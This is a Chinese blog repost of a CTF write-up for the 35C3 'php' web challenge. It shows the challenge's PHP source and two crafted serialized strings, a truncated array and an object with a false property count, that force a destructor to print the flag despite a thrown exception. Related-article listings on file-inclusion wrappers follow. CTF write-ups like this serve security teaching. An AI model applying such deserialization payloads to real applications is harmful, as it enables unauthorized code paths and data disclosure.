35C3 CTF - Web - php

最新推荐文章于 2024-03-02 17:33:26 发布
最新推荐文章于 2024-03-02 17:33:26 发布
阅读量238 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/Antiver/p/10296187.html
版权

参考链接

https://ctftime.org/task/7404

题目描述

PHP's unserialization mechanism can be exceptional.

解题流程

程序代码

<?php
$line = trim(fgets(STDIN));
$flag = file_get_contents('/flag');

class B {
  function __destruct() {
    global $flag;
    echo $flag;
  }
}

$a = @unserialize($line);
throw new Exception('Well that was unexpected…');
echo $a;

我们用以下代码产生一个正常的序列:

class B {
    
}

$a = array(1,2,new B(),3,4);
echo serialize($a);

用以上代码构造序列化数组:a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4;},把最后面的分号去掉变成a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4},将该序列发送给php程序即可显示flag。

<?php

$test = new B();
$serialize_test = serialize($test);
echo $serialize_test;

上述代码会产生序列:O:1:"B":0:{},把0改成1,序列变为O:1:"B":1:{},把这个序列发送给php程序也能获得flag。

转载于:https://www.cnblogs.com/Antiver/p/10296187.html

weixin_30294295
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】
等风来
05-22 9687
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
ctfweb题型找到php后怎么做,CTFweb总结
weixin_39521009的博客
04-01 2677
身为一只web小白,但也刷了不少CTF方面的web题,趁着今天有时间,坐下来总结一下关于web的解题方法。0x01 直接查看源代码解题方法:点击右键,查看页面源代码将hidden改为text,value=0改为value=1,点击Enter。出现下图:这段代码的意思就是,将我们传给PIN的值给a,如果a=-1982774773616112831283716166172777371616672727...
35C3 CTF Pwn namespaces
yongbaoii的博客
01-18 651
docker逃逸的ctf赛目
ctfshow web入门 php特性
Sentiment的博客
04-11 5332
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTF解题-web
qq_42936836的博客
08-24 5611
记录的一些CTFweb题目~~~
35c3ctf
03-18
35c3ctf】是35th Chaos Communication Congress(35届混沌通信大会)的CTF(Capture The Flag)比赛的相关资料。CTF是一种流行的信息安全竞赛形式,参与者通常需要展示他们的黑客技能、逆向工程能力、密码学知识...
KF35C-8.25连接器 3D封装
11-17
标题中的“KF35C-8.25连接器 3D封装”指的是一个特定的电子连接器模型,KF35C系列,其中8.25可能是该型号的一个规格参数,可能代表连接器的接触间距或者尺寸。在电子工程领域,连接器是设备或电路板之间传输电流或...
35c3-webkid:35C3WebKid浏览器开发挑战的写作
05-09
35C3CTF-WebKid编写 介绍 自从我想开始使用浏览器以来已经有很长时间了,这个35c3ctf挑战似乎是一个很好的起点。 本文将从完整的初学者的角度撰写。 希望它将帮助人们开始更好地了解一些细微差别。 挑战 可以在CCC...
35c3:我为35c3创造的挑战
03-18
在这个名为“35c3 CTF挑战”的项目中,创建者设计了一系列的安全挑战,供参与者解决。CTF比赛通常包括多个类别,如逆向工程、密码学、网络攻防、Web安全等。由于标签指定为“PHP”,我们可以推断这个挑战主要关注的...
angular-ui-utils-47ff7ef35c-sources.jar
03-08
官方版本,亲测可用
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战 使用PHPWeb中进行CTF挑战 链接: :
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile及sql文件的过渡会做适当的修改(或者重写,因为有的过渡按给的文件运行不起来。。可能是我打开的方式不对),对于大部分没有的版本,会自己编写(复制粘贴)提供相应的文件 如有bug,还望知道 建造 每道译文对应的端口需要自行在run脚本中更改 cd the_challenge chmod 777 build run ./build ./run 分类 SQLi RCE XSS SSRF 未盐化 文件包含 XXE 科学技术研究院
CTF——Web——PHP序列化和反序列化
小锤队长的博客
08-09 5739
PHP 序列化和反序列化: 1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列化...
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1764
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP的弱比较 进入正题之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 941
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
ctf show-web入门 php特性篇部分题解
volcano的博客
02-24 3378
ctfshowphp特性preg_match()intval()web96(路径问题)web98web99(in_array弱类型比较)in_array()web100var_dump()函数web101web102-103hex2bin()函数substr() 函数call_user_func()函数web104、106web105(双$$变量覆盖)web107(parse_str变量覆盖)parse_str()Parse_str()函数引起的变量覆盖漏洞web108(%00截断)ereg()函数strr
CTF Web题部分PHP魔术方法总结(Magic Methods)
Mark的博客
11-30 1963
几个常见的PHP魔术方法简单介绍详细介绍__sleep()__wakeup()__get()__set()__isset()__unset()__construct()__destruct()__call()__callStatic()__autoload()__toString() 简单介绍 方法名 描述 __sleep() 执行序列化serialize()时,先会调用这个函数 __wakeup() 执行反序列化unserialize()时,先会调用这个函数 __get() 当获
ctfweb小白必备php基础知识
qq_48511129的博客
02-03 1161
本篇文章对ctfweb小白很有用,请耐心看完 <? php echo 'hello,world'; ?> <?php表示程序开始,?>表示程序结束 每行代码必须以分号结尾。 echo是php的输出函数 <?php $a=3; $b=4; $c=$a+$b; echo "$a+$b="."$c"; ?> 变量以$符号开头,变量名称对大小写敏感。 可以直接通过赋值来指定变量类型。 双引号中的变量会被解析执行。 点好.用于连接字符串。 p
ctf_show笔记篇(web入门---php特性)
最新发布
whale_waves的博客
03-02 1208
原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL。如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。
网络安全新手入门学习资料
05-14
以下是网络安全新手入门学习资料的建议: 1. 网络安全基础知识:《网络安全概论》(第二版)(www.ituring.com.cn/book/1749) 2. 网络安全攻防技术:《白帽子讲Web安全》(www.ituring.com.cn/book/946) 3. 网络安全工具使用:Kali Linux(www.kali.org) 4. 网络安全漏洞挖掘:《Web安全深度剖析》(www.ituring.com.cn/book/1206) 5. 网络安全实战:CTF(Capture The Flag)比赛(https://ctftime.org/) 6. 网络安全新闻:安全客(www.anquanke.com) 7. 网络安全博客:FreeBuf(www.freebuf.com) 8. 网络安全课程:MOOC(www.icourse163.org)和Coursera(www.coursera.org) 以上资源是网络安全入门的良好起点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值